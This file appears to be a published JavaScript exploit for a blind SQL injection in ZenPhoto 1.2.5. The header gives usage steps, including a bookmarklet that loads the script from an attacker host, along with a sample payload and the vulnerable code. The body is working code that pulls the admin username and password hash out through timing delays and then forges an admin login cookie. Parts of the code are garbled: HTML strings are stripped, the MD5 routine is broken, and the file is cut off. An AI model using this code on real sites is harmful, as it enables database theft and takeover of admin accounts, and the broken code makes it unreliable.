/*
* ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit
* Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category
*
* What does this exploit let you do:
* The precoded functions I provided will allow you to extract the username and password hash of the admin from the database.
* It will also let you login to the admin panel w/o actually knowing the plain text password (only the username and hash are required)
*
* How To Use:
* 1) upload this script to http://attacker/exploit.js
* 2) open a vulnerable category in your webbrowser (Example: http://victim/zenphoto/news/category/anycategorynamehere)
* 3) Enter the following code into your address bar:
* javascript:(function(){var url = "http://attacker/exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})();
* 4) Press enter and wait for the exploit console to show
* 5) You may now extract the username/password hash from the database (buggy :( )
* 6) Use the username/password hash with the Login Emulation tool to login to the admin panel
* 7) Have fun :)
*
* WARNING: THIS IS BUGGY! You might not get the hash/username correct the first time. Play with the settings below to tweak it so it works better for you
*
* Why this works:
* The sanitize function doesn't escape single quotes...
*
* Vulnerable Code (index.php):
* 95: $catname = sanitize($_GET['category']);
* 96: query("UPDATE ".prefix('zenpage_news_categories')." SET `hitcounter` = `hitcounter`+1 WHERE `cat_link` = '".$catname."'",true);
*
* Patch:
* 95: $catname = mysql_real_escape_string($_GET['category']);
*
* Example Exploitation:
* /zenphoto/news/category/cat1' and hitcounter = (SELECT IF(SUBSTRING(password,1 ,1) = 'A',BENCHMARK(5000000,ENCODE('this will probably','waste some time')),null) FROM zp_administrators) and '1' = '1
*
* This payload will delay the page from loading for about 5 seconds if the first letter of the password hash is 'A'
*
* The time detection isn't perfect and was pretty much slapped together. Make sure you try editing the variables below or
* make your own injector :P
*
* Discovered and Coded by petros@dusecurity.com
* Shoutz to xplorer and the rest of the DuSec Team
*/
// Change this if you are having problems with the injection
var patience = .8; // Time in seconds on how patient we are. Will be substracted from the benchmark time
var max_retries = 3; // maximum retries after failed HTTP request
var charset_hash = "0123456789abcdef".split(''); // charset for the password hash
var charset_username = "abcdefghiklmnopqrstuvqxzy0123456789ABCEDFGHIJKLMNOPQRSTUVWXYZ ._".split(''); // charset for the username
var username_max = 64; // max length of the username
var hash_max = 32; // max length of password hash (its md5..i wouldnt change this)
var benchmark_code = "BENCHMARK(5850000,ENCODE('this will probably','waste some time'))"; // code used to slow down requests if the query is true
var show_timing = false; // whether or not to show the timings of each request (good for debugging)
var delay = 1500; // delay in miliseconds between request
var err_delay = 1000; //delay in miliseconds to wait after an error
// Dont edit below this line
var display = false;
var display_loot = false;
var loot = false;
var loot_username = false;
var loot_password = false;
function get(page) // returns how long it took to send/receive the request...
{
var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.open('GET', page, false); // keep it syncronized..
xhr.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" ); // cache..
var seconds = getTime();
xhr.send(null);
seconds = getTime() - seconds;
var success = (xhr.readyState == 4 && xhr.status == 200);
xhr = null; // dispose
return { 'miliseconds': seconds, 'seconds': seconds / 1000, 'success': success };
}
function getTime()
{
return Math.round(new Date().getTime());
}
function createDisplay() // create the display div
{
var div = document.createElement("DIV");
div.style.backgroundColor = '#C3FFB9';
div.style.border = '2px dashed green';
div.style.margin = '3px';
div.style.paddingLeft = '10px';
div.style.paddingBottom = '10px';
div.innerHTML = '
ZenPhoto Blind Injection -- petros@dusecurity
';
display = document.createElement("P");
document.body.insertBefore(div, document.body.childNodes[0]);
div.appendChild(display);
}
function write(text)
{
display.innerHTML += text + " ";
}
function setDisplay(text)
{
display.innerHTML = text;
}
function clearDisplay()
{
display.innerHTML = '';
}
function getPath()
{
return window.location.pathname;
}
function showMenu()
{
clearDisplay();
write('What you like to do?');
var ul = document.createElement('OL'); // changed to OL so they know to do it in steps
createListItem('Extract Admin Username', 'extractusername();',ul);
createListItem('Extract Admin Password','extractpassword();',ul);
createListItem('Login to Admin using Hash', 'adminlogin();', ul);
display.appendChild(ul);
}
var un;
var pw;
function adminlogin()
{
clearDisplay();
write("Admin Login Emulator: ");
un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]');
pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]');
createButton('Pwn!', "step2();");
write(' Back To Menu');
}
function step2()
{
var username = un.value;
var password = pw.value;
var auth =MD5(username + password);
SetCookie('zenphoto_auth', MD5(username + password), 30);
clearDisplay();
write("Generated auth cookie: zenphoto_auth=" + auth);
write("You are now logged in with admin privileges :)");
write('Enter Admin Panel');
write(' Back To Menu');
}
function createTextbox(label, value)
{
display.innerHTML += "" + label + "";
var tb = document.createElement('input');
tb.type = 'text';
tb.value = value;
display.appendChild(tb);
write('');
return tb;
}
function createButton(text, click)
{
write("");
}
function addEvent(elem, type, handle)
{
if (elem.addEventListener)
elem.addEventListener(type, handle, false);
else if (elem.attachEvent)
elem.attachEvent("on" + type, handle);
}
// borrowed function
function SetCookie(cookieName,cookieValue,nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires="+expire.toGMTString() + ";path=../../";
}
function extractusername()
{
clearDisplay();
var path = getPath();
var basetime = 0;
var benchmark = 0;
var diff = 0;
var offset = 0;
var charset_len = charset_username.length;
var resp = false;
loot = '';
display_loot = false;
write("Extracting username..");
write("Using path: " + path);
resp = get(path);
if(!resp.success) { write("Failed to request page."); return; }
basetime = resp.miliseconds;
write("Normal request time set to " + basetime + " milisecond(s)");
resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
benchmark = resp.miliseconds;
diff = benchmark - basetime;
if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();}
write("Benchmark request time set to " + benchmark + " milisecond(s)");
if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
write("Username: ");
display_loot = document.getElementById('loot');
var retries = 0;
var min = diff - (patience * 1000);
var best_match = 0;
var best = '';
if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
function readNextChar()
{
var c = charset_username[offset];
display_loot.innerHTML = '';
display_loot.innerHTML += loot + c;
resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
retries = 0; //reset error counter
var took = resp.miliseconds - basetime; //difference
if(took > 0 && best_match < took) {best_match = took; best = c;}
if(show_timing)
write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
if(took >= min)
{
loot += c;
if(show_timing)
write("got \"" + loot + "\" so far...");
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
best = '';
best_match = 0;
offset = 0;
}
else
offset++;
if(loot.length >= username_max)
{
display_loot.innerHTML = ''; display_loot += loot;
loot_username = loot;
write('Back To Menu');
alert("Admin Username is \"" + loot + "\"\r\n(reached max length)");
return;
}
if(offset < charset_len)
setTimeout(readNextChar, delay);
else
{
if(loot.length < username_max)
{
write("best match: " + best_match);
function beAnAsshole(){
loot += best;
best = ''; best_match = 0;
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
offset = 0;
setTimeout(readNextChar, delay);
return;}
}
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
loot_username = loot;
write('Back To Menu');
alert("Admin Username is \"" + loot + "\"");
}
}
readNextChar();
}
function extractpassword()
{
clearDisplay();
var path = getPath();
var basetime = 0;
var benchmark = 0;
var diff = 0;
var offset = 0;
var charset_len = charset_hash.length;
var resp = false;
loot = '';
display_loot = false;
write("Extracting password..");
write("Using path: " + path);
resp = get(path);
if(!resp.success) { write("Failed to request page."); return; }
basetime = resp.miliseconds;
write("Normal request time set to " + basetime + " milisecond(s)");
resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
benchmark = resp.miliseconds;
write("Benchmark request time set to " + benchmark + " milisecond(s)");
if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
write("Password: ");
display_loot = document.getElementById('loot');
var retries = 0;
diff = benchmark - basetime;
if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;}
var min = diff- (patience * 1000);
var best_match = 0;
var best = '';
if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
function readNextChar()
{
var c = charset_hash[offset];
display_loot.innerHTML = '';
display_loot.innerHTML += loot + c;
resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
var took = resp.miliseconds - basetime;
retries = 0;
if(took > 0 && took > best_match) {best_match = took; best = c;}
if(show_timing)
write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
if(took >= min)
{
loot += c;
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
offset = 0;
best = ''; best_match = 0;
}
else
offset++;
if(loot.length >= hash_max)
{
display_loot.innerHTML = ''; display_loot += loot;
loot_password = loot;
write('Back To Menu');
alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)");
return;
}
if(offset < charset_len)
setTimeout(readNextChar, delay);
else
{
if(loot.length < hash_max)
{
loot += best;
best = ''; best_match = 0;
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
offset = 0;
setTimeout(readNextChar, delay);
return;
}
display_loot.innerHTML = '';
display_loot.innerHTML += loot;
loot_password = loot;
write('Back To Menu');
alert("Admin Password Hash is \"" + loot + "\"");
}
}
readNextChar();
}
function createListItem(label, onclick, list)
{
var li = document.createElement("LI");
li.innerHTML = '' + label + "";
list.appendChild(li);
}
createDisplay();
showMenu();
/**
*
* MD5 (Message-Digest Algorithm)
* http://www.webtoolkit.info/
*
**/
var MD5 = function (string) {
function RotateLeft(lValue, iShiftBits) {
return (lValue<>>(32-iShiftBits));
}
function AddUnsigned(lX,lY) {
var lX4,lY4,lX8,lY8,lResult;
lX8 = (lX & 0x80000000);
lY8 = (lY & 0x80000000);
lX4 = (lX & 0x40000000);
lY4 = (lY & 0x40000000);
lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
if (lX4 & lY4) {
return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
}
if (lX4 | lY4) {
if (lResult & 0x40000000) {
return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
} else {
return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
}
} else {
return (lResult ^ lX8 ^ lY8);
}
}
function F(x,y,z) { return (x & y) | ((~x) & z); }
function G(x,y,z) { return (x & z) | (y & (~z)); }
function H(x,y,z) { return (x ^ y ^ z); }
function I(x,y,z) { return (y ^ (x | (~z))); }
function FF(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
};
function GG(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
};
function HH(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
};
function II(a,b,c,d,x,s,ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b);
};
function ConvertToWordArray(string) {
var lWordCount;
var lMessageLength = string.length;
var lNumberOfWords_temp1=lMessageLength + 8;
var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
var lWordArray=Array(lNumberOfWords-1);
var lBytePosition = 0;
var lByteCount = 0;
while ( lByteCount < lMessageLength ) {
lWordCount = (lByteCount-(lByteCount % 4))/4;
lBytePosition = (lByteCount % 4)*8;
lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29;
return lWordArray;
};
function WordToHex(lValue) {
var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
for (lCount = 0;lCount<=3;lCount++) {
lByte = (lValue>>>(lCount*8)) & 255;
WordToHexValue_temp = "0" + lByte.toString(16);
WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
}
return WordToHexValue;
};
function Utf8Encode(string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
};
var x=Array();
var k,AA,BB,CC,DD,a,b,c,d;
var S11=7, S12=12, S13=17, S14=22;
var S21=5, S22=9 , S23=14, S24=20;
var S31=4, S32=11, S33=16, S34=23;
var S41=6, S42=10, S43=15, S44=21;
string = Utf8Encode(string);
x = ConvertToWordArray(string);
a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
for (k=0;k